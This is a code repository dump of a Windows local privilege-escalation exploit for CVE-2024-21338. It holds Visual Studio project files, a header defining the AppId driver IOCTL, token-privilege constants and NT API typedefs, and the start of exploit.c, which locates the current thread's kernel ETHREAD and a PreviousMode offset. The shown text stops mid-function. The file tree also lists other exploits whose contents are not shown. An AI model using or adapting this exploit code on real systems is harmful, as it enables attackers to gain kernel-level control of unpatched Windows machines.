└── Windows ├── CVE-2024-21338 ├── CVE-2024-21338.png ├── CVE-2024-21338.sln ├── CVE-2024-21338 │ ├── CVE-2024-21338.vcxproj │ ├── CVE-2024-21338.vcxproj.filters │ ├── CVE-2024-21338.vcxproj.user │ ├── Common.h │ ├── exploit.c │ └── main.c └── readme.md ├── CVE-2024-38041 ├── CVE-2024-38041.sln ├── CVE-2024-38041.vcxproj ├── CVE-2024-38041.vcxproj.filters ├── CVE-2024-38041.vcxproj.user ├── Common.h ├── exploit.c ├── main.c └── readme.md ├── Crashdumps └── 010_editor_crash.txt └── SystemMechanicPro ├── Defs.h └── exploit.c /Windows/CVE-2024-21338/CVE-2024-21338.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nero22k/Exploits/99e8c3957c8318e0305385adb92175034d1b3041/Windows/CVE-2024-21338/CVE-2024-21338.png -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.8.34330.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-21338", "CVE-2024-21338\CVE-2024-21338.vcxproj", "{B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x64.ActiveCfg = Debug|x64 17 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x64.Build.0 = Debug|x64 18 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x86.ActiveCfg = Debug|Win32 19 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x86.Build.0 = Debug|Win32 20 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x64.ActiveCfg = Release|x64 21 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x64.Build.0 = Release|x64 22 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x86.ActiveCfg = Release|Win32 23 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {72FE2A8A-AE33-4983-8401-4C1E8DEEEE6B} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {b9e4fad9-5b1f-4990-af61-6a978f7f5bf6} 25 | CVE202421338 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | MultiThreaded 122 | 123 | 124 | Console 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 2136 10224 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | int exploit(); 6 | 7 | // https://github.com/gtworek/PSBits/blob/e233709faa16a974d3af606c2dafe37ffe8f7aa9/Misc/TokenStealWithSyscalls.c 8 | #define LUID_SE_ASSIGNPRIMARYTOKEN 3 9 | #define LUID_SE_DEBUG 20 10 | #define LUID_SE_IMPERSONATE 29 11 | #define STATUS_NOT_ALL_ASSIGNED 262 12 | 13 | #define CHECK_STATUS(Msg, Status) if (ERROR_SUCCESS != (Status)) {wprintf(L"LINE %d: %s%lu\r\n", __LINE__, (Msg), (Status));} 14 | 15 | #define IOCTL_AipSmartHashImageFile 0x22A018 16 | 17 | typedef struct _CFG_FUNCTION_WRAPPER 18 | { 19 | PVOID FunctionPointer; 20 | } CFG_FUNCTION_WRAPPER, * PCFG_FUNCTION_WRAPPER; 21 | 22 | typedef struct _USER_BUFFER_W10 23 | { 24 | UINT64 FirstArg; // 8 bytes - Reserved or used as needed 25 | PVOID Value; // 8 bytes - Should be 0 according to the requirement 26 | PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER 27 | } USER_BUFFER_W10, * PUSER_BUFFER_W10; 28 | 29 | typedef struct _USER_BUFFER_W11 30 | { 31 | UINT64 FirstArg; // 8 bytes - Reserved or used as needed 32 | PVOID Value; // 8 bytes - Should be 0 according to the requirement 33 | PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER 34 | PVOID Unknown; // 8 bytes - Reserved or used as needed 35 | } USER_BUFFER_W11, * PUSER_BUFFER_W11; 36 | 37 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 38 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 39 | #define OBJ_CASE_INSENSITIVE 0x00000040L 40 | #define FILE_OPEN 0x00000001 41 | #define OFFSET_OF_TOKEN_PRIVILEGES 0x40 42 | 43 | #define InitializeObjectAttributes( p, n, a, r, s, t ) { \ 44 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 45 | (p)->RootDirectory = r; \ 46 | (p)->Attributes = a; \ 47 | (p)->ObjectName = n; \ 48 | (p)->SecurityDescriptor = s; \ 49 | (p)->SecurityQualityOfService = t; \ 50 | } 51 | 52 | typedef enum _THREADINFOCLASS 53 | { 54 | ThreadImpersonationToken = 5 //Rust docs say so 55 | } THREADINFOCLASS; 56 | 57 | typedef enum _SYSTEM_INFORMATION_CLASS { 58 | SystemBasicInformation = 0, 59 | SystemProcessorInformation = 1, 60 | SystemPerformanceInformation = 2, 61 | SystemTimeOfDayInformation = 3, 62 | SystemPathInformation = 4, 63 | SystemProcessInformation = 5, 64 | SystemCallCountInformation = 6, 65 | SystemDeviceInformation = 7, 66 | SystemProcessorPerformanceInformation = 8, 67 | SystemFlagsInformation = 9, 68 | SystemCallTimeInformation = 10, 69 | SystemModuleInformation = 11, 70 | SystemLocksInformation = 12, 71 | SystemStackTraceInformation = 13, 72 | SystemPagedPoolInformation = 14, 73 | SystemNonPagedPoolInformation = 15, 74 | SystemHandleInformation = 16, 75 | SystemObjectInformation = 17, 76 | SystemPageFileInformation = 18, 77 | SystemVdmInstemulInformation = 19, 78 | SystemVdmBopInformation = 20, 79 | SystemFileCacheInformation = 21, 80 | SystemPoolTagInformation = 22, 81 | SystemInterruptInformation = 23, 82 | SystemDpcBehaviorInformation = 24, 83 | SystemFullMemoryInformation = 25, 84 | SystemLoadGdiDriverInformation = 26, 85 | SystemUnloadGdiDriverInformation = 27, 86 | SystemTimeAdjustmentInformation = 28, 87 | SystemSummaryMemoryInformation = 29, 88 | SystemMirrorMemoryInformation = 30, 89 | SystemPerformanceTraceInformation = 31, 90 | SystemObsolete0 = 32, 91 | SystemExceptionInformation = 33, 92 | SystemCrashDumpStateInformation = 34, 93 | SystemKernelDebuggerInformation = 35, 94 | SystemContextSwitchInformation = 36, 95 | SystemRegistryQuotaInformation = 37, 96 | SystemExtendServiceTableInformation = 38, 97 | SystemPrioritySeperation = 39, 98 | SystemVerifierAddDriverInformation = 40, 99 | SystemVerifierRemoveDriverInformation = 41, 100 | SystemProcessorIdleInformation = 42, 101 | SystemLegacyDriverInformation = 43, 102 | SystemCurrentTimeZoneInformation = 44, 103 | SystemLookasideInformation = 45, 104 | SystemTimeSlipNotification = 46, 105 | SystemSessionCreate = 47, 106 | SystemSessionDetach = 48, 107 | SystemSessionInformation = 49, 108 | SystemRangeStartInformation = 50, 109 | SystemVerifierInformation = 51, 110 | SystemVerifierThunkExtend = 52, 111 | SystemSessionProcessInformation = 53, 112 | SystemLoadGdiDriverInSystemSpace = 54, 113 | SystemNumaProcessorMap = 55, 114 | SystemPrefetcherInformation = 56, 115 | SystemExtendedProcessInformation = 57, 116 | SystemRecommendedSharedDataAlignment = 58, 117 | SystemComPlusPackage = 59, 118 | SystemNumaAvailableMemory = 60, 119 | SystemProcessorPowerInformation = 61, 120 | SystemEmulationBasicInformation = 62, 121 | SystemEmulationProcessorInformation = 63, 122 | SystemExtendedHandleInformation = 64, 123 | SystemLostDelayedWriteInformation = 65, 124 | SystemBigPoolInformation = 66, 125 | SystemSessionPoolTagInformation = 67, 126 | SystemSessionMappedViewInformation = 68, 127 | SystemHotpatchInformation = 69, 128 | SystemObjectSecurityMode = 70, 129 | SystemWatchdogTimerHandler = 71, 130 | SystemWatchdogTimerInformation = 72, 131 | SystemLogicalProcessorInformation = 73, 132 | SystemWow64SharedInformationObsolete = 74, 133 | SystemRegisterFirmwareTableInformationHandler = 75, 134 | SystemFirmwareTableInformation = 76, 135 | SystemModuleInformationEx = 77, 136 | SystemVerifierTriageInformation = 78, 137 | SystemSuperfetchInformation = 79, 138 | SystemMemoryListInformation = 80, 139 | SystemFileCacheInformationEx = 81, 140 | SystemThreadPriorityClientIdInformation = 82, 141 | SystemProcessorIdleCycleTimeInformation = 83, 142 | SystemVerifierCancellationInformation = 84, 143 | SystemProcessorPowerInformationEx = 85, 144 | SystemRefTraceInformation = 86, 145 | SystemSpecialPoolInformation = 87, 146 | SystemProcessIdInformation = 88, 147 | SystemErrorPortInformation = 89, 148 | SystemBootEnvironmentInformation = 90, 149 | SystemHypervisorInformation = 91, 150 | SystemVerifierInformationEx = 92, 151 | SystemTimeZoneInformation = 93, 152 | SystemImageFileExecutionOptionsInformation = 94, 153 | SystemCoverageInformation = 95, 154 | SystemPrefetchPatchInformation = 96, 155 | SystemVerifierFaultsInformation = 97, 156 | SystemSystemPartitionInformation = 98, 157 | SystemSystemDiskInformation = 99, 158 | SystemProcessorPerformanceDistribution = 100, 159 | SystemNumaProximityNodeInformation = 101, 160 | SystemDynamicTimeZoneInformation = 102, 161 | SystemCodeIntegrityInformation = 103, 162 | SystemProcessorMicrocodeUpdateInformation = 104, 163 | SystemProcessorBrandString = 105, 164 | SystemVirtualAddressInformation = 106, 165 | SystemLogicalProcessorAndGroupInformation = 107, 166 | SystemProcessorCycleTimeInformation = 108, 167 | SystemStoreInformation = 109, 168 | SystemRegistryAppendString = 110, 169 | SystemAitSamplingValue = 111, 170 | SystemVhdBootInformation = 112, 171 | SystemCpuQuotaInformation = 113, 172 | SystemNativeBasicInformation = 114, 173 | SystemErrorPortTimeouts = 115, 174 | SystemLowPriorityIoInformation = 116, 175 | SystemBootEntropyInformation = 117, 176 | SystemVerifierCountersInformation = 118, 177 | SystemPagedPoolInformationEx = 119, 178 | SystemSystemPtesInformationEx = 120, 179 | SystemNodeDistanceInformation = 121, 180 | SystemAcpiAuditInformation = 122, 181 | SystemBasicPerformanceInformation = 123, 182 | SystemQueryPerformanceCounterInformation = 124, 183 | SystemSessionBigPoolInformation = 125, 184 | SystemBootGraphicsInformation = 126, 185 | SystemScrubPhysicalMemoryInformation = 127, 186 | SystemBadPageInformation = 128, 187 | SystemProcessorProfileControlArea = 129, 188 | SystemCombinePhysicalMemoryInformation = 130, 189 | SystemEntropyInterruptTimingInformation = 131, 190 | SystemConsoleInformation = 132, 191 | SystemPlatformBinaryInformation = 133, 192 | SystemPolicyInformation = 134, 193 | SystemHypervisorProcessorCountInformation = 135, 194 | SystemDeviceDataInformation = 136, 195 | SystemDeviceDataEnumerationInformation = 137, 196 | SystemMemoryTopologyInformation = 138, 197 | SystemMemoryChannelInformation = 139, 198 | SystemBootLogoInformation = 140, 199 | SystemProcessorPerformanceInformationEx = 141, 200 | SystemCriticalProcessErrorLogInformation = 142, 201 | SystemSecureBootPolicyInformation = 143, 202 | SystemPageFileInformationEx = 144, 203 | SystemSecureBootInformation = 145, 204 | SystemEntropyInterruptTimingRawInformation = 146, 205 | SystemPortableWorkspaceEfiLauncherInformation = 147, 206 | SystemFullProcessInformation = 148, 207 | SystemKernelDebuggerInformationEx = 149, 208 | SystemBootMetadataInformation = 150, 209 | SystemSoftRebootInformation = 151, 210 | SystemElamCertificateInformation = 152, 211 | SystemOfflineDumpConfigInformation = 153, 212 | SystemProcessorFeaturesInformation = 154, 213 | SystemRegistryReconciliationInformation = 155, 214 | SystemEdidInformation = 156, 215 | SystemManufacturingInformation = 157, 216 | SystemEnergyEstimationConfigInformation = 158, 217 | SystemHypervisorDetailInformation = 159, 218 | SystemProcessorCycleStatsInformation = 160, 219 | SystemVmGenerationCountInformation = 161, 220 | SystemTrustedPlatformModuleInformation = 162, 221 | SystemKernelDebuggerFlags = 163, 222 | SystemCodeIntegrityPolicyInformation = 164, 223 | SystemIsolatedUserModeInformation = 165, 224 | SystemHardwareSecurityTestInterfaceResultsInformation = 166, 225 | SystemSingleModuleInformation = 167, 226 | SystemAllowedCpuSetsInformation = 168, 227 | SystemVsmProtectionInformation = 169, 228 | SystemInterruptCpuSetsInformation = 170, 229 | SystemSecureBootPolicyFullInformation = 171, 230 | SystemCodeIntegrityPolicyFullInformation = 172, 231 | SystemAffinitizedInterruptProcessorInformation = 173, 232 | SystemRootSiloInformation = 174, 233 | SystemCpuSetInformation = 175, 234 | SystemCpuSetTagInformation = 176, 235 | SystemWin32WerStartCallout = 177, 236 | SystemSecureKernelProfileInformation = 178, 237 | SystemCodeIntegrityPlatformManifestInformation = 179, 238 | SystemInterruptSteeringInformation = 180, 239 | SystemSupportedProcessorArchitectures = 181, 240 | SystemMemoryUsageInformation = 182, 241 | SystemCodeIntegrityCertificateInformation = 183, 242 | SystemPhysicalMemoryInformation = 184, 243 | SystemControlFlowTransition = 185, 244 | SystemKernelDebuggingAllowed = 186, 245 | SystemActivityModerationExeState = 187, 246 | SystemActivityModerationUserSettings = 188, 247 | SystemCodeIntegrityPoliciesFullInformation = 189, 248 | SystemCodeIntegrityUnlockInformation = 190, 249 | SystemIntegrityQuotaInformation = 191, 250 | SystemFlushInformation = 192, 251 | SystemProcessorIdleMaskInformation = 193, 252 | SystemSecureDumpEncryptionInformation = 194, 253 | SystemWriteConstraintInformation = 195, 254 | SystemKernelVaShadowInformation = 196, 255 | SystemHypervisorSharedPageInformation = 197, 256 | SystemFirmwareBootPerformanceInformation = 198, 257 | SystemCodeIntegrityVerificationInformation = 199, 258 | SystemFirmwarePartitionInformation = 200, 259 | SystemSpeculationControlInformation = 201, 260 | SystemDmaGuardPolicyInformation = 202, 261 | SystemEnclaveLaunchControlInformation = 203, 262 | SystemWorkloadAllowedCpuSetsInformation = 204, 263 | SystemCodeIntegrityUnlockModeInformation = 205, 264 | SystemLeapSecondInformation = 206, 265 | SystemFlags2Information = 207, 266 | SystemSecurityModelInformation = 208, 267 | SystemCodeIntegritySyntheticCacheInformation = 209, 268 | SystemFeatureConfigurationInformation = 210, 269 | SystemFeatureConfigurationSectionInformation = 211, 270 | SystemFeatureUsageSubscriptionInformation = 212, 271 | SystemSecureSpeculationControlInformation = 213, 272 | SystemSpacesBootInformation = 214, 273 | SystemFwRamdiskInformation = 215, 274 | SystemWheaIpmiHardwareInformation = 216, 275 | SystemDifSetRuleClassInformation = 217, 276 | SystemDifClearRuleClassInformation = 218, 277 | SystemDifApplyPluginVerificationOnDriver = 219, 278 | SystemDifRemovePluginVerificationOnDriver = 220, 279 | SystemShadowStackInformation = 221, 280 | SystemBuildVersionInformation = 222, 281 | SystemPoolLimitInformation = 223, 282 | SystemCodeIntegrityAddDynamicStore = 224, 283 | SystemCodeIntegrityClearDynamicStores = 225, 284 | SystemDifPoolTrackingInformation = 226, 285 | SystemPoolZeroingInformation = 227, 286 | SystemDpcWatchdogInformation = 228, 287 | SystemDpcWatchdogInformation2 = 229, 288 | SystemSupportedProcessorArchitectures2 = 230, 289 | SystemSingleProcessorRelationshipInformation = 231, 290 | SystemXfgCheckFailureInformation = 232, 291 | SystemIommuStateInformation = 233, 292 | SystemHypervisorMinrootInformation = 234, 293 | SystemHypervisorBootPagesInformation = 235, 294 | SystemPointerAuthInformation = 236, 295 | SystemSecureKernelDebuggerInformation = 237, 296 | SystemOriginalImageFeatureInformation = 238, 297 | MaxSystemInfoClass = 239 298 | } SYSTEM_INFORMATION_CLASS; 299 | 300 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO 301 | { 302 | unsigned short UniqueProcessId; 303 | unsigned short CreatorBackTraceIndex; 304 | unsigned char ObjectTypeIndex; 305 | unsigned char HandleAttributes; 306 | unsigned short HandleValue; 307 | void* Object; 308 | unsigned long GrantedAccess; 309 | long __PADDING__[1]; 310 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 311 | 312 | typedef struct _SYSTEM_HANDLE_INFORMATION 313 | { 314 | ULONG NumberOfHandles; 315 | struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 316 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; 317 | 318 | typedef struct SYSTEM_MODULE { 319 | ULONG Reserved1; 320 | ULONG Reserved2; 321 | #ifdef _WIN64 322 | ULONG Reserved3; 323 | #endif 324 | PVOID ImageBaseAddress; 325 | ULONG ImageSize; 326 | ULONG Flags; 327 | WORD Id; 328 | WORD Rank; 329 | WORD w018; 330 | WORD NameOffset; 331 | CHAR Name[255]; 332 | }SYSTEM_MODULE, * PSYSTEM_MODULE; 333 | 334 | typedef struct SYSTEM_MODULE_INFORMATION { 335 | ULONG ModulesCount; 336 | SYSTEM_MODULE Modules[1]; 337 | } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; 338 | 339 | typedef struct _UNICODE_STRING { 340 | USHORT Length; 341 | USHORT MaximumLength; 342 | PWSTR Buffer; 343 | } UNICODE_STRING, * PUNICODE_STRING; 344 | 345 | typedef struct _OBJECT_ATTRIBUTES 346 | { 347 | ULONG Length; 348 | HANDLE RootDirectory; 349 | PUNICODE_STRING ObjectName; 350 | ULONG Attributes; 351 | PVOID SecurityDescriptor; 352 | PVOID SecurityQualityOfService; 353 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 354 | 355 | typedef struct _IO_STATUS_BLOCK 356 | { 357 | union 358 | { 359 | NTSTATUS Status; 360 | PVOID Pointer; 361 | }; 362 | ULONG_PTR Information; 363 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 364 | 365 | typedef struct _CLIENT_ID 366 | { 367 | HANDLE UniqueProcess; 368 | HANDLE UniqueThread; 369 | } CLIENT_ID, * PCLIENT_ID; 370 | 371 | typedef 372 | VOID 373 | (NTAPI* PIO_APC_ROUTINE) ( 374 | IN PVOID ApcContext, 375 | IN PIO_STATUS_BLOCK IoStatusBlock, 376 | IN ULONG Reserved 377 | ); 378 | 379 | typedef NTSTATUS (NTAPI* pNtOpenProcessToken)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle); 380 | typedef NTSTATUS (NTAPI* pNtAdjustPrivilegesToken)(HANDLE TokenHandle, BOOLEAN DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, ULONG BufferLength, PTOKEN_PRIVILEGES PreviousState, PULONG ReturnLength); 381 | typedef NTSTATUS (NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 382 | typedef NTSTATUS (NTAPI* pNtDuplicateToken)(HANDLE ExistingTokenHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, BOOLEAN EffectiveOnly, TOKEN_TYPE TokenType, PHANDLE NewTokenHandle); 383 | typedef NTSTATUS (NTAPI* pNtSetInformationThread)(HANDLE ThreadHandle, THREADINFOCLASS ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength); 384 | typedef NTSTATUS (NTAPI* pNtQueryInformationToken)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength); 385 | typedef NTSTATUS (NTAPI* pNtClose)(HANDLE Handle); 386 | 387 | typedef NTSTATUS(NTAPI* pRtlGetVersion)(LPOSVERSIONINFOEXW lpVersionInformation); 388 | 389 | typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)( 390 | _In_ HANDLE FileHandle, 391 | _In_opt_ HANDLE Event, 392 | _In_opt_ PIO_APC_ROUTINE ApcRoutine, 393 | _In_opt_ PVOID ApcContext, 394 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 395 | _In_ ULONG IoControlCode, 396 | _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer, 397 | _In_ ULONG InputBufferLength, 398 | _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, 399 | _In_ ULONG OutputBufferLength 400 | ); 401 | 402 | typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)( 403 | HANDLE ProcessHandle, 404 | PVOID BaseAddress, 405 | PVOID Buffer, 406 | ULONG NumberOfBytesToWrite, 407 | PULONG NumberOfBytesWritten 408 | ); 409 | 410 | typedef NTSTATUS(NTAPI* pNtCreateFile)( 411 | _Out_ PHANDLE FileHandle, 412 | _In_ ACCESS_MASK DesiredAccess, 413 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 414 | _Out_ PIO_STATUS_BLOCK IoStatusBlock, 415 | _In_opt_ PLARGE_INTEGER AllocationSize, 416 | _In_ ULONG FileAttributes, 417 | _In_ ULONG ShareAccess, 418 | _In_ ULONG CreateDisposition, 419 | _In_ ULONG CreateOptions, 420 | _In_reads_bytes_opt_(EaLength) PVOID EaBuffer, 421 | _In_ ULONG EaLength 422 | ); 423 | 424 | typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)( 425 | __in SYSTEM_INFORMATION_CLASS SystemInformationClass, 426 | __inout PVOID SystemInformation, 427 | __in ULONG SystemInformationLength, 428 | __out_opt PULONG ReturnLength 429 | ); 430 | 431 | typedef VOID(NTAPI* pRtlInitUnicodeString)( 432 | _Out_ PUNICODE_STRING DestinationString, 433 | _In_opt_z_ PCWSTR SourceString 434 | ); 435 | 436 | extern pNtAdjustPrivilegesToken NtAdjustPrivilegesToken; 437 | extern pNtOpenProcessToken NtOpenProcessToken; 438 | extern pNtWriteVirtualMemory NtWriteVirtualMemory; 439 | extern pNtOpenProcess NtOpenProcess; 440 | extern pNtDuplicateToken NtDuplicateToken; 441 | extern pNtSetInformationThread NtSetInformationThread; 442 | extern pNtQueryInformationToken NtQueryInformationToken; 443 | extern pNtClose NtClose; 444 | extern pNtDeviceIoControlFile NtDeviceIoControlFile; 445 | extern pNtCreateFile NtCreateFile; 446 | extern pNtQuerySystemInformation NtQuerySystemInformation; 447 | extern pRtlInitUnicodeString RtlInitUnicodeString; 448 | extern pRtlGetVersion RtlGetVersion; -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/exploit.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | void* CheckWindowsVersionAndSetOffsets(size_t* kthreadoffset, OSVERSIONINFOEXW* osInfo) 4 | { 5 | osInfo->dwOSVersionInfoSize = sizeof(*osInfo); 6 | 7 | NTSTATUS status = RtlGetVersion(osInfo); 8 | if (status != STATUS_SUCCESS) { 9 | wprintf(L"Failed to get OS version\n"); 10 | return NULL; 11 | } 12 | 13 | wprintf(L"[+] Windows version: %lu.%lu Build %lu\n", osInfo->dwMajorVersion, osInfo->dwMinorVersion, osInfo->dwBuildNumber); 14 | 15 | *kthreadoffset = 0x232; // PreviousMode offset 16 | void* userbuffer = NULL; 17 | 18 | if (osInfo->dwBuildNumber < 22000) { 19 | userbuffer = malloc(sizeof(USER_BUFFER_W10)); 20 | } 21 | else { 22 | userbuffer = malloc(sizeof(USER_BUFFER_W11)); 23 | } 24 | 25 | return userbuffer; 26 | } 27 | 28 | UINT_PTR GetETHREADAddress() 29 | { 30 | NTSTATUS status; 31 | HANDLE hCurrentThreadPseudoHandle = ((HANDLE)(LONG_PTR)-2); 32 | HANDLE hDuplicatedHandle = NULL; 33 | UINT_PTR tokenAddress = 0; 34 | ULONG ulBytes = 0; 35 | PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL; 36 | 37 | BOOL success = DuplicateHandle( 38 | ((HANDLE)(LONG_PTR)-1), 39 | hCurrentThreadPseudoHandle, 40 | ((HANDLE)(LONG_PTR)-1), 41 | &hDuplicatedHandle, 42 | 0, 43 | FALSE, 44 | DUPLICATE_SAME_ACCESS); 45 | 46 | if (!success) 47 | { 48 | wprintf(L"Failed to duplicate handle. Error: %lu\n", GetLastError()); 49 | return 1; 50 | } 51 | 52 | while ((status = NtQuerySystemInformation(SystemHandleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH) 53 | { 54 | if (handleTableInfo != NULL) 55 | { 56 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes); 57 | } 58 | 59 | else 60 | { 61 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes); 62 | } 63 | } 64 | 65 | if (status == 0) 66 | { 67 | for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++) 68 | { 69 | if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() && handleTableInfo->Handles[i].HandleValue == (USHORT)hDuplicatedHandle) 70 | { 71 | tokenAddress = (UINT_PTR)handleTableInfo->Handles[i].Object; 72 | break; 73 | } 74 | } 75 | } 76 | else 77 | { 78 | if (handleTableInfo != NULL) 79 | { 80 | wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status); 81 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 82 | CloseHandle(hDuplicatedHandle); 83 | return 0; 84 | } 85 | } 86 | 87 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 88 | 89 | return tokenAddress; 90 | } 91 | 92 | UINT_PTR GetFILE_OBJECT_Address() 93 | { 94 | NTSTATUS status; 95 | HANDLE hDuplicatedHandle = NULL; 96 | UINT_PTR tokenAddress = 0; 97 | ULONG ulBytes = 0; 98 | PSYSTEM_HANDLE_INFORMATION handleTableInfo = NULL; 99 | 100 | HANDLE hFile = CreateFileW(L"C:\\Users\\Public\\example.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 101 | 102 | if (hFile == INVALID_HANDLE_VALUE) 103 | { 104 | wprintf(L"Failed to duplicate handle. Error: %lu\n", GetLastError()); 105 | return 1; 106 | } 107 | // Allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API 108 | while ((status = NtQuerySystemInformation(SystemHandleInformation, 